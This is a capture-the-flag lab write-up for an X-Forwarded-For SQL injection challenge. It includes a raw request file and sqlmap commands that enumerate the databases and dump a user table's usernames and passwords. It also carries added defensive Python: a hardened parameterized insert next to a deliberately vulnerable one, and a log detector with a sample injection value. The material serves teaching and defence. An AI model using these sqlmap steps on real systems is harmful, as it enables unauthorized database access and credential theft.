I. Target address
https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe
II. Tools used
Firefox browser, SQLMAP
III. Confirming the vulnerability
The challenge states that this is an X-Forwarded-For injection vulnerability; first confirm whether that is actually the case.
1. Enter an arbitrary username and password and click Login.
2. Returned result
A garbled popup appears; that does not matter. Open the debug window with F12 and look at the request and the response there.
3. Popup message
The popup tells me that my IP address 27.17.187.13 has been recorded, probably in the database, i.e. the IP is written to the database. Since there is interaction with the database, I can guess
that there may be a SQL injection vulnerability here; continue to confirm.
4. How the server obtains the client IP address
One way a server obtains the client's IP address is by reading the value of the X-Forwarded-For request header; whether this server obtains it that way is not yet confirmed. Edit the request just sent,
adding the header X-Forwarded-For: 111.23.21.23 to it (this is our forged IP address; any well-formed IP address will do), and resend it.
You can see that the arbitrarily chosen address 111.23.21.23 placed in the X-Forwarded-For field has been recorded, which confirms that the server reads the X-Forwarded-For header
to obtain the client IP address. Next, use SQLMAP to confirm directly that the X-Forwarded-For SQL injection vulnerability is present.
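The flaw confirmed above has two parts: the server takes the X-Forwarded-For value from whoever sends it, and it writes that value into SQL by string splicing. The following is an added example (not the code of the challenge target, which is a PHP page) written in Python with sqlite3 so it can be run offline. It shows the vulnerable pattern next to a hardened version that only consults X-Forwarded-For behind a proxy the operator controls, rejects anything that does not parse as an IP address, and uses a parameterized INSERT. The header dictionary, the table name and the function names are assumptions made for the example.

```python
import ipaddress
import sqlite3

# Constructed sample headers (not from the page); in a real application these
# come from the HTTP request. "Remote-Addr" stands in for the TCP peer address.
SAMPLE_HEADERS = {
    "X-Forwarded-For": "111.23.21.23",
    "Remote-Addr": "10.0.0.5",
}


def new_db():
    """In-memory table standing in for the target's IP-logging table (assumed name)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, ip TEXT)")
    return conn


def count_visits(conn):
    return conn.execute("SELECT COUNT(*) FROM visits").fetchone()[0]


def record_ip_vulnerable(conn, headers):
    """Mirror of the flaw described above: the X-Forwarded-For value is trusted
    as-is and spliced into the SQL text, so the header reaches the SQL parser.
    Kept only for contrast with the hardened version below."""
    ip = headers.get("X-Forwarded-For", headers["Remote-Addr"])
    conn.execute(f"INSERT INTO visits (ip) VALUES ('{ip}')")  # vulnerable


def client_ip_from_headers(headers, trusted_proxy=False):
    """Return a validated client IP address as a string.

    X-Forwarded-For is only consulted when the request arrived through a proxy
    we operate (trusted_proxy=True); otherwise the peer address is used. In both
    cases the value must parse as an IP address or a ValueError is raised before
    anything touches the database."""
    candidate = headers["Remote-Addr"]
    if trusted_proxy and "X-Forwarded-For" in headers:
        # The header is "client, proxy1, proxy2, ..."; the first entry is the
        # address the nearest proxy saw as the original client.
        candidate = headers["X-Forwarded-For"].split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        raise ValueError("malformed client address in request")


def record_ip_hardened(conn, headers, trusted_proxy=False):
    """Validate first, then insert with a bound parameter instead of string splicing."""
    ip = client_ip_from_headers(headers, trusted_proxy)
    conn.execute("INSERT INTO visits (ip) VALUES (?)", (ip,))
    return ip


if __name__ == "__main__":
    conn = new_db()
    print(record_ip_hardened(conn, SAMPLE_HEADERS, trusted_proxy=True))   # 111.23.21.23
    print(record_ip_hardened(conn, SAMPLE_HEADERS, trusted_proxy=False))  # 10.0.0.5
```

The validation step matters on its own: even with a parameterized query, recording an unvalidated X-Forwarded-For value lets any client write arbitrary text into the IP column, which is exactly what the forged 111.23.21.23 demonstrated above.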
IV. Running the injection with SQLMAP
1. Capture the second login request, create a new txt file (here named x-forwarded-for.txt), and set the X-Forwarded-For value to *; the file contents are as follows:
POST /index.php HTTP/1.1
Host: 219.153.49.228:48584
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Connection: keep-alive
Referer: http://219.153.49.228:48584/index.php
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
X-Forwarded-For: *

username=fff&password=ddd
2. Confirm the vulnerability (command: sqlmap.py -r x-forwarded-for.txt --batch; run it from the directory containing x-forwarded-for.txt)
3. List the databases (sqlmap.py -r x-forwarded-for.txt --batch --dbs)
4. Query the current database (sqlmap.py -r x-forwarded-for.txt --batch --current-db)
5. List the tables in the database (sqlmap.py -r x-forwarded-for.txt --batch --tables -D "webcalendar")
6. List the columns of a table (taking user as an example: sqlmap.py -r x-forwarded-for.txt --batch --columns -T "user" -D "webcalendar")
7. Dump the contents of a table (taking user as an example: sqlmap.py -r x-forwarded-for.txt --batch --dump -C "id,username,password" --columns -T "user" -D "webcalendar")
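A run like the one above leaves a clear trace: every injected request carries an X-Forwarded-For value that is not a list of IP addresses, and hundreds of them arrive from the same peer in a short time. The following is an added detection example, not part of the original write-up or of any tool it mentions. It assumes a web server log format in which the X-Forwarded-For value is appended as xff="..." (an assumed format; the sample lines are constructed, not taken from the page) and flags requests whose header does not parse as IP addresses, then counts them per peer address.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample log lines (assumed combined-log layout with xff="..." appended).
# Line 4 carries a value with a quote and SQL keywords, as an injection tool would send.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [01/Oct/2019:10:00:00 +0800] "POST /index.php HTTP/1.1" 200 512 xff="27.17.187.13"',
    '10.0.0.5 - - [01/Oct/2019:10:00:07 +0800] "POST /index.php HTTP/1.1" 200 512 xff="111.23.21.23"',
    '10.0.0.5 - - [01/Oct/2019:10:01:30 +0800] "POST /index.php HTTP/1.1" 200 512 xff="203.0.113.9, 198.51.100.2"',
    '10.0.0.7 - - [01/Oct/2019:10:01:31 +0800] "POST /index.php HTTP/1.1" 500 0 xff="111.23.21.23\' AND 1=1"',
    '10.0.0.5 - - [01/Oct/2019:10:01:32 +0800] "POST /index.php HTTP/1.1" 200 512 xff="-"',
])

LOG_RE = re.compile(
    r'^(?P<peer>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) xff="(?P<xff>[^"]*)"$'
)


def parse_line(line):
    """Split one log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def xff_is_well_formed(value):
    """True when the header is absent ('-') or every comma-separated entry is an IP address."""
    if value.strip() in ("", "-"):
        return True
    try:
        for entry in value.split(","):
            ipaddress.ip_address(entry.strip())
    except ValueError:
        return False
    return True


def flag_malformed_xff(log_text):
    """Return (line number, peer address, header value) for every request whose
    X-Forwarded-For value is not a list of IP addresses."""
    flagged = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is not None and not xff_is_well_formed(rec["xff"]):
            flagged.append((lineno, rec["peer"], rec["xff"]))
    return flagged


def peers_by_malformed_count(log_text):
    """Count flagged requests per peer; a scanner shows up as one peer with many hits."""
    return Counter(peer for _, peer, _ in flag_malformed_xff(log_text))


if __name__ == "__main__":
    for lineno, peer, xff in flag_malformed_xff(SAMPLE_LOG):
        print(f"line {lineno}: peer {peer} sent X-Forwarded-For={xff!r}")
    print(peers_by_malformed_count(SAMPLE_LOG))
```

Note that the forged but well-formed 111.23.21.23 from the confirmation step is not flagged by this check; a malformed-header rule only catches the injection phase, so the per-peer count (and the 500 responses that appear once the SQL breaks) is what makes the pattern stand out.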